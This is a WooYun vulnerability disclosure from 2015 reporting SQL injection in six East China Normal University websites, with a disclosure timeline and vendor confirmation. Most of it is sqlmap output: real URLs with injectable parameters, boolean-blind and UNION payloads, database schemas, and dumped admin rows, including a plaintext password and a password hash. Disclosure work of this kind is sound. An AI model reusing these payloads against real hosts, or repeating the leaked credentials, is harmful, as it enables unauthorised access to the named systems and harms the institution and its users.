当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154632

漏洞标题:华东师范大学多站存在SQL注入

相关厂商:华东师范大学

漏洞作者: 路人甲

提交时间:2015-11-21 16:53

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-21: 细节已通知厂商并且等待厂商处理中
2015-11-23: 厂商已经确认,细节仅向厂商公开
2015-12-03: 细节向核心白帽子及相关领域专家公开
2015-12-13: 细节向普通白帽子公开
2015-12-23: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

华东师范大学多站存在SQL注入

详细说明:

1.
华东师范大学基础教育研究新视野存在SQL注入

1.png


注入点:http://www.deduold.ecnu.edu.cn/show.aspx?info_id=2149&info_lb=98&flag=98

sqlmap identified the following injection point(s) with a total of 82 HTTP(s) requests:
---
Parameter: info_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: info_id=2149 AND 5478=5478&info_lb=98&flag=98
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: info_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: info_id=2149 AND 5478=5478&info_lb=98&flag=98
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[1 table]
+------+
| menu |
+------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: info_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: info_id=2149 AND 5478=5478&info_lb=98&flag=98
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: menu
[4 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| fid | numeric |
| id | numeric |
| menu | non-numeric |
| power | non-numeric |
+--------+-------------+


2.注入点id:
http://sbc.ecnu.edu.cn/detail.asp?id=2655&typetitle=%E9%83%A8%E9%97%A8%E6%A6%82%E5%86%B5&title=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81&n=1

sqlmap identified the following injection point(s) with a total of 31 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2655 AND 2970=2970&typetitle=%E9%83%A8%E9%97%A8%E6%A6%82%E5%86%B5&title=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81&n=1
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: id=-1038 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(118)&CHR(118)&CHR(113)&CHR(113)&CHR(108)&CHR(81)&CHR(107)&CHR(97)&CHR(86)&CHR(114)&CHR(107)&CHR(98)&CHR(99)&CHR(103)&CHR(113)&CHR(107)&CHR(113)&CHR(106)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&typetitle=%E9%83%A8%E9%97%A8%E6%A6%82%E5%86%B5&title=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81&n=1
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2655 AND 2970=2970&typetitle=%E9%83%A8%E9%97%A8%E6%A6%82%E5%86%B5&title=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81&n=1
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: id=-1038 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(118)&CHR(118)&CHR(113)&CHR(113)&CHR(108)&CHR(81)&CHR(107)&CHR(97)&CHR(86)&CHR(114)&CHR(107)&CHR(98)&CHR(99)&CHR(103)&CHR(113)&CHR(107)&CHR(113)&CHR(106)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&typetitle=%E9%83%A8%E9%97%A8%E6%A6%82%E5%86%B5&title=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81&n=1
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[1 table]
+----------+
| tb_admin |
+----------+


管理员表和内容

Table: tb_admin
[4 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| data | non-numeric |
| id | numeric |
| pwd | non-numeric |
| username | non-numeric |
+----------+-------------+
Table: tb_admin
[1 entry]
+----+--------------+------+----------+
| id | pwd | data | username |
+----+--------------+------+----------+
| 1 | admin:sbc123 | <blank> | admin |
+----+--------------+------+----------+

明文存储,好像不太应该哈!
3.注入点:
http://sklec.ecnu.edu.cn/forecast/Development.asp?id=6

sqlmap identified the following injection point(s) with a total of 57 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=6 AND 6900=6900
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: id=-3337 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(118)&CHR(118)&CHR(113)&CHR(113)&CHR(101)&CHR(116)&CHR(119)&CHR(103)&CHR(71)&CHR(113)&CHR(97)&CHR(104)&CHR(98)&CHR(97)&CHR(113)&CHR(112)&CHR(107)&CHR(118)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=6 AND 6900=6900
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: id=-3337 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(118)&CHR(118)&CHR(113)&CHR(113)&CHR(101)&CHR(116)&CHR(119)&CHR(103)&CHR(71)&CHR(113)&CHR(97)&CHR(104)&CHR(98)&CHR(97)&CHR(113)&CHR(112)&CHR(107)&CHR(118)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[5 tables]
+---------+
| ad |
| article |
| contact |
| manager |
| news |
+---------+


Table: manager
[4 columns]
+----------------+-------------+
| Column | Type |
+----------------+-------------+
| admin_name | non-numeric |
| admin_password | non-numeric |
| data | non-numeric |
| id | numeric |
+----------------+-------------+
Database: Microsoft_Access_masterdb
Table: manager
[1 entry]
+----+------+------------+------------------+
| id | data | admin_name | admin_password |
+----+------+------------+------------------+
| 1 | <blank> | admin | 9edd2238da801275 |
+----+------+------------+------------------+

漏洞证明:

4.注入点:
http://www.bs.ecnu.edu.cn/newshow.asp?id=935

sqlmap identified the following injection point(s) with a total of 81 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=935 AND 7426=7426
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=935 AND 7426=7426
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[8 tables]
+----------+
| user |
| admin |
| download |
| feedback |
| market |
| news |
| product |
| vote |
+----------+


Table: admin
[5 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| user | non-numeric |
| id | numeric |
| password | non-numeric |
| title | non-numeric |
| username | non-numeric |
+----------+-------------+


总共123条记录:

2.png


用户表:

Table: user
[12 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| user | non-numeric |
| email | non-numeric |
| homepage | non-numeric |
| id | numeric |
| logins | numeric |
| mobile | non-numeric |
| password | non-numeric |
| phone | numeric |
| question | non-numeric |
| title | non-numeric |
| userid | numeric |
| username | non-numeric |
+----------+-------------+


2.png


5.http://lifeold.ecnu.edu.cn/sites/bioteacher/content.asp?id=1604&belong=syjx
http://lifeold.ecnu.edu.cn/sites/bioteacher/swjsjyw.asp?belong=jxzy

sqlmap identified the following injection point(s) with a total of 83 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1604 AND 1088=1088&belong=syjx
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:
---
Parameter: belong (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: belong=jxzy' AND 6266=6266 AND 'dJeN'='dJeN
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access


6.注入点:
http://eng.ecnu.edu.cn/news.php?tid=5

sqlmap identified the following injection point(s) with a total of 282 HTTP(s) requests:
---
Parameter: tid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tid=5 AND 8121=8121
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.5
back-end DBMS: MySQL >= 5.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: tid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tid=5 AND 8121=8121
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.5
back-end DBMS: MySQL 5
available databases [1]:
[*] english_manage
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: tid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tid=5 AND 8121=8121
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.5
back-end DBMS: MySQL 5
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: tid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tid=5 AND 8121=8121
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.5
back-end DBMS: MySQL 5
available databases [1]:
[*] english_manage

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-23 15:31

厂商回复:

通知二级单位处理

最新状态:

暂无